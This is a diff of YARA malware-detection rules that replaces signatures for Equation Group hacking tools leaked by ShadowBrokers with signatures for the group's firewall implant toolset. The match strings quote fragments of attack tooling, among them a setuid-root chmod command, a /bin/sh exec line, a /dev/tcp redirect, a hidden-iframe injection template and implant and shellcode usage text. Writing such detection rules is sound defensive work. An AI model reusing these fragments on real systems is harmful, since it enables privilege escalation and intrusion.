-		$x4 = "--- ewok version" fullword ascii
+		$s1 = "Could not connect to target device: %s:%d. Please check IP address." fullword ascii
+		$s2 = "command data size is invalid for an exec cmd" fullword ascii
+		$s3 = "A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma" ascii
+		$s4 = "Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]" fullword ascii
+		$s5 = "Execute 0x%08x with args (%08x, %08x, %08x): [y/n]" fullword ascii
+		$s6 = "[%d] Execute code." fullword ascii
+		$s7 = "Execute 0x%08x with args (%08x): [y/n]" fullword ascii
+		$s8 = "dump_value_LHASH_DOALL_ARG" fullword ascii
+		$s9 = "Eggcode is complete. Pass execution to it? [y/n]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 80KB and 1 of them )
+		( uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Xspy : FILE
+rule SIGNATURE_BASE_EQGRP_Create_Http_Injection : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file xspy"
+		description = "EQGRP Toolset Firewall - file create_http_injection.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fcb7246a-d613-51d7-a4f7-f767fa5f79e1"
-		date = "2017-04-08"
+		id = "92b6dad0-c7d8-5522-8fc1-fbd0aae00960"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L786-L799"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L784-L802"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "94ab45d6c94c63c5c9c68ee3d509143af4eb574058c0cd4f26eed8058dbd9213"
+		logic_hash = "3a2ee46c6fec1b7a501e8c0e2963d4873ede89d192d0f4701d051f782e8ece99"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf"
+		hash1 = "de52f5621b4f3896d4bd1fb93ee8be827e71a2b189a9f8552b68baed062a992d"
 
 	strings:
-		$s1 = "USAGE: xspy -display <display> -delay <usecs> -up" fullword ascii
+		$x1 = "required by SECONDDATE" fullword ascii
+		$s1 = "help='Output file name (optional). By default the resulting data is written to stdout.')" fullword ascii
+		$s2 = "data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"" ascii
+		$s3 = "version='%prog 1.0'," fullword ascii
+		$s4 = "usage='%prog [ ... options ... ] url'," fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 60KB and all of them )
+		( uint16( 0 ) == 0x2123 and filesize < 3KB and ( $x1 or 2 of them ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Estesfox
+rule SIGNATURE_BASE_EQGRP_BFLEA_2201 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox"
+		description = "EQGRP Toolset Firewall - file BFLEA-2201.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f2e8b8ba-af09-5e7c-a99c-4f620a0917c9"
-		date = "2017-04-08"
+		id = "7dfdc2a2-73d1-5eba-8936-ed14b17495c5"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L801-L814"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L804-L823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bfbc8ac62dcb61b492b1803de535f51ceb54ac83e45071270a6ef5faeaa521b2"
+		logic_hash = "d0fd4d0ffe98856abed685c4b9ff770daba22aa16bd860440874fd94df2d54ea"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a"
+		hash1 = "15e8c743770e44314496c5f27b6297c5d7a4af09404c4aa507757e0cc8edc79e"
 
 	strings:
-		$x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii
+		$s1 = ".got_loader" fullword ascii
+		$s2 = "LOADED" fullword ascii
+		$s3 = "readFlashHandler" fullword ascii
+		$s4 = "KEEPGOING" fullword ascii
+		$s5 = "flashRtnsPix6x.c" fullword ascii
+		$s6 = "fix_ip_cksum_incr" fullword ascii
+		$s7 = "writeFlashHandler" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 5 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Elatedmonkey_1_0_1_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Bpfcreator_RHEL4 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh"
+		description = "EQGRP Toolset Firewall - file BpfCreator-RHEL4"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8915305-2ed7-50b7-84d0-b139a6d3481a"
-		date = "2017-04-08"
-		modified = "2022-08-18"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L816-L832"
+		id = "476185f2-b093-5fb9-8604-891e96fe52a9"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L825-L842"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "756337ecb951357c5440ea2fe010982089539c35dc556288d61db6de22348c1f"
+		logic_hash = "8586425b13355170137d66fe8d52ed98982d7c5699b26a8c0132f107b4af43d8"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bd7303393409623cabf0fcf2127a0b81fae52fe40a0d2b8db0f9f092902bbd92"
 
 	strings:
-		$s1 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii
-		$s2 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii
-		$s3 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii
-		$s4 = "cat > /dev/tcp/127.0.0.1/80 <<" ascii
+		$s1 = "usage %s \"<tcpdump pcap string>\" <outfile>" fullword ascii
+		$s2 = "error reading dump file: %s" fullword ascii
+		$s3 = "truncated dump file; tried to read %u captured bytes, only got %lu" fullword ascii
+		$s4 = "%s: link-layer type %d isn't supported in savefiles" fullword ascii
+		$s5 = "DLT %d is not one of the DLTs supported by this device" fullword ascii
 
 	condition:
-		filesize < 15KB and 2 of them
+		( uint16( 0 ) == 0x457f and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Scanner : FILE
+rule SIGNATURE_BASE_EQGRP_Storefc
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file scanner"
+		description = "EQGRP Toolset Firewall - file StoreFc.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2f9c534-0ca7-5223-b85e-8e74c3cfa6ff"
-		date = "2017-04-08"
+		id = "48bbf5c9-e884-5126-93a2-d27650409882"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L834-L849"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L844-L859"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b0454fd41d3591fc5811da6407a422b7c28d0b923109cdfa85b337cc7fffb178"
+		logic_hash = "f07c3ef83808852f70fb5cbc4436d531675344ab74f83888cd70d987c3544cce"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
+		hash1 = "f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108"
 
 	strings:
-		$x1 = "program version netid     address             service         owner" fullword ascii
-		$x4 = "*** Sorry about the raw output, I'll leave it for now" fullword ascii
-		$x5 = "-scan winn %s one" fullword ascii
+		$x1 = "Usage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the conf" ascii
+		$x2 = "raise Exception, \"Must supply both a config file and implant file.\"" fullword ascii
+		$x3 = "This is wrapper for Store.py that FELONYCROWBAR will use. This" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup__Ftshell_Ftshell_V3_10_3_0 : FILE
+rule SIGNATURE_BASE_EQGRP_Hexdump : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
+		description = "EQGRP Toolset Firewall - file hexdump.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
-		date = "2017-04-08"
+		id = "32a7d845-2fa3-5d8f-84e1-2c7f8d2ca8c8"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L853-L871"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L861-L877"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1eb7915fd057b2cc5f788ca11b3c71210ce5e7ac29c52790c249490435e62926"
+		logic_hash = "ed36aa5a69296088bdd1db42e6561377294b7bd99c30104b9d4a618d899d7e9a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
-		hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
+		hash1 = "95a9a6a8de60d3215c1c9f82d2d8b2640b42f5cabdc8b50bd1f4be2ea9d7575a"
 
 	strings:
-		$s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" fullword ascii
-		$s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii
-		$s3 = "system rm -f /current/tmp/ftshell.latest" fullword ascii
-		$s4 = "# ftshell -- File Transfer Shell" fullword ascii
+		$s1 = "def hexdump(x,lead=\"[+] \",out=sys.stdout):" fullword ascii
+		$s2 = "print >>out, \"%s%04x  \" % (lead,i)," fullword ascii
+		$s3 = "print >>out, \"%02X\" % ord(x[i+j])," fullword ascii
+		$s4 = "print >>out, sane(x[i:i+16])" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 100KB and 1 of them ) or ( 2 of them )
+		( uint16( 0 ) == 0x2123 and filesize < 1KB and 2 of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup__Scanner_Scanner_V2_1_2 : FILE
+rule SIGNATURE_BASE_EQGRP_BBALL : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2"
+		description = "EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf1f2119-f742-5106-96f0-de88755275ef"
-		date = "2017-04-08"
+		id = "bced11a2-fac4-58e5-a4a8-1c6d5fe418f9"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L873-L892"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L879-L898"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c42aaacea1347fd64d7f91421f692e77e33e273d4c2e71806ef7f5f086aba11"
+		logic_hash = "b02d17a13725b5215c89590abf77f960e79f9fd155c9ea4e9eb903710a7a375e"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
-		hash2 = "9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff"
+		hash1 = "498fc9f20b938b8111adfa3ca215325f265a08092eefd5300c4168876deb7bf6"
 
 	strings:
-		$s1 = "Welcome to the network scanning tool" fullword ascii
-		$s2 = "Scanning port %d" fullword ascii
-		$s3 = "/current/down/cmdout/scans" fullword ascii
-		$s4 = "Scan for SSH version" fullword ascii
-		$s5 = "program vers proto   port  service" fullword ascii
+		$s1 = "Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S" fullword ascii
+		$s2 = ".got_loader" fullword ascii
+		$s3 = "handler_readBIOS" fullword ascii
+		$s4 = "cmosReadByte" fullword ascii
+		$s5 = "KEEPGOING" fullword ascii
+		$s6 = "checksumAreaConfirmed.0" fullword ascii
+		$s7 = "writeSpeedPlow.c" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 100KB and 2 of them ) or ( all of them )
+		( uint16( 0 ) == 0x457f and filesize < 40KB and 4 of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup__Ghost_Sparc_Ghost_X86_3 : FILE
+rule SIGNATURE_BASE_EQGRP_BARPUNCH_BPICKER : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86"
+		description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ccc9c9be-8f78-5071-a11e-47f994cf8f08"
-		date = "2017-04-08"
+		id = "7e88ba9d-1f15-533a-b388-a2a027ddb07c"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L894-L912"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L902-L921"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c4ad8e06934c1ece520863951f14cbf86d1bc4bba97aede1d58def1e5c7df4eb"
+		logic_hash = "f5d0cc881bedad736a90109933da8dbd32c4435aa255676c68ae3541bbb61e74"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1"
-		hash2 = "82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33"
+		hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+		hash2 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
 
 	strings:
-		$x1 = "Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target" fullword ascii
-		$x2 = "Sending shellcode as part of an open command..." fullword ascii
-		$x3 = "cmdshellcode" fullword ascii
-		$x4 = "You will not be able to run the shellcode. Exiting..." fullword ascii
+		$x1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u" fullword ascii
+		$x2 = "%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]" fullword ascii
+		$x3 = "* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)" fullword ascii
+		$x4 = "%s version %s already has persistence installed. If you want to uninstall," fullword ascii
+		$x5 = "The active module(s) on the target are not meant to be persisted" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 70KB and 1 of them ) or ( 2 of them )
+		( uint16( 0 ) == 0x457f and filesize < 6000KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup__Pclean_V2_1_1_Pclean_V2_1_1_4 : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen6 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64"
+		description = "EQGRP Toolset Firewall"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ed4a3b3a-0935-533b-80dd-ee23b2e8df00"
-		date = "2017-04-08"
+		id = "1b1c6426-7274-5fd4-9ea2-ef10bda769d4"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L914-L930"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L923-L951"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5622d6fff876fa5d07795491d14f0396378c1b07b69cf8bcabb5e0bd3c19e72a"
+		logic_hash = "9f0aa1994199c8cef543b7602b574726171dd96df159a0c496db0c60c339c4d0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
-		hash2 = "ab7f26faed8bc2341d0517d9cb2bbf41795f753cd21340887fc2803dc1b9a1dd"
+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+		hash7 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$s1 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
-		$s2 = "e.g.: -n 1-1024,1080,6666,31337 " fullword ascii
+		$s1 = "LP.c:pixSecurity - Improper number of bytes read in Security/Interface Information" fullword ascii
+		$s2 = "LP.c:pixSecurity - Not in Session" fullword ascii
+		$s3 = "getModInterface__preloadedModules" fullword ascii
+		$s4 = "showCommands" fullword ascii
+		$s5 = "readModuleInterface" fullword ascii
+		$s6 = "Wrapping_Not_Necessary_Or_Wrapping_Ok" fullword ascii
+		$s7 = "Get_CMD_List" fullword ascii
+		$s8 = "LP_Listen2" fullword ascii
+		$s9 = "killCmdList" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and all of them )
+		( uint16( 0 ) == 0x457f and filesize < 6000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup__Jparsescan_Parsescan_5 : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen5 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan"
+		description = "EQGRP Toolset Firewall"
 		author = "Florian Roth (Nextron Systems)"
-		id = "964a4e49-9163-5dd6-bb2c-88fa39d5f356"
-		date = "2017-04-08"
+		id = "e35748ee-d530-5e73-a74d-5675d05725e9"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L932-L950"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L953-L978"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "719baa53db53f4cc4f3e9ed935814e42e5cb4b7fb8eaaa373feb73df69bfcde0"
+		logic_hash = "d4bbd9dbde4ca1da80d49157363ade3ec47d55828529ec7e1a46b64d07c991f0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
-		hash2 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+		hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+		hash8 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$s1 = "# default is to dump out all scanned hosts found" fullword ascii
-		$s2 = "$bool .= \" -r \" if (/mibiisa.* -r/);" fullword ascii
-		$s3 = "sadmind is available on two ports, this also works)" fullword ascii
-		$s4 = "-x IP      gives \\\"hostname:# users:load ...\\\" if positive xwin scan" fullword ascii
+		$x1 = "Module and Implant versions do not match.  This module is not compatible with the target implant" fullword ascii
+		$s1 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log" fullword ascii
+		$s2 = "%s/BF_%04d%02d%02d.log" fullword ascii
+		$s3 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 40KB and 1 of them ) or ( 2 of them )
+		( uint16( 0 ) == 0x457f and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup__Funnelout_V4_1_0_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Pandarock : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl"
+		description = "EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0c42b06-8314-5731-b333-59bb90785cf4"
-		date = "2017-04-08"
+		id = "aa0ee05b-b3e4-576a-8a32-bdc8d98fe636"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L952-L969"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L980-L1007"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ae0b387725017de2766593ea55677dca36eee68107e0692a7d5e2526db74765b"
+		logic_hash = "d0a61410d7c5f309489ef4553f41a3a6fb7d0f24bcdb1f0d88e896265513add2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash2 = "457ed14e806fdbda91c4237c8dc058c55e5678f1eecdd78572eff6ca0ed86d33"
+		hash1 = "1214e282ac7258e616ebd76f912d4b2455d1b415b7216823caa3fc0d09045a5f"
+		hash2 = "c8a151df7605cb48feb8be2ab43ec965b561d2b6e2a837d645fdf6a6191ab5fe"
 
 	strings:
-		$s1 = "header(\"Set-Cookie: bbsessionhash=\" . \\$hash . \"; path=/; HttpOnly\");" fullword ascii
-		$s2 = "if ($code =~ /proxyhost/) {" fullword ascii
-		$s3 = "\\$rk[1] = \\$rk[1] - 1;" ascii
-		$s4 = "#existsUser($u) or die \"User '$u' does not exist in database.\\n\";" fullword ascii
+		$x1 = "* Not attempting to execute \"%s\" command" fullword ascii
+		$x2 = "TERMINATING SCRIPT (command error or \"quit\" encountered)" fullword ascii
+		$x3 = "execute code in <file> passing <argX> (HEX)" fullword ascii
+		$x4 = "* Use arrow keys to scroll through command history" fullword ascii
+		$s1 = "pitCmd_processCmdLine" fullword ascii
+		$s2 = "execute all commands in <file>" fullword ascii
+		$s3 = "__processShellCmd" ascii
+		$s4 = "pitTarget_getDstPort" fullword ascii
+		$s5 = "__processSetTargetIp" ascii
+		$o1 = "Logging commands and output - ON" fullword ascii
+		$o2 = "This command is too dangerous.  If you'd like to run it, contact the development team" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
+		( uint16( 0 ) == 0x457f and filesize < 3000KB and 1 of ( $x* ) ) or ( 4 of them ) or 1 of ( $o* )
 }
-rule SIGNATURE_BASE_Equationgroup__Magicjack_V1_1_0_0_Client : FILE
+rule SIGNATURE_BASE_EQGRP_Bananausurper_Writejetplow : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py"
+		description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be18f36c-3d6c-53a3-89b6-bfc53e1dd87d"
-		date = "2017-04-08"
+		id = "901af182-cbfa-533a-a055-565d95005d62"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L971-L988"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1009-L1028"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e22b01aa9b1283fa7a326b7c0f8047ed373fac750c89e9ba02c49f0f454e275"
+		logic_hash = "101e75800291a7603e03145bff298d7587c9b5f19102e7ba9ed3bf2b544fa5cf"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
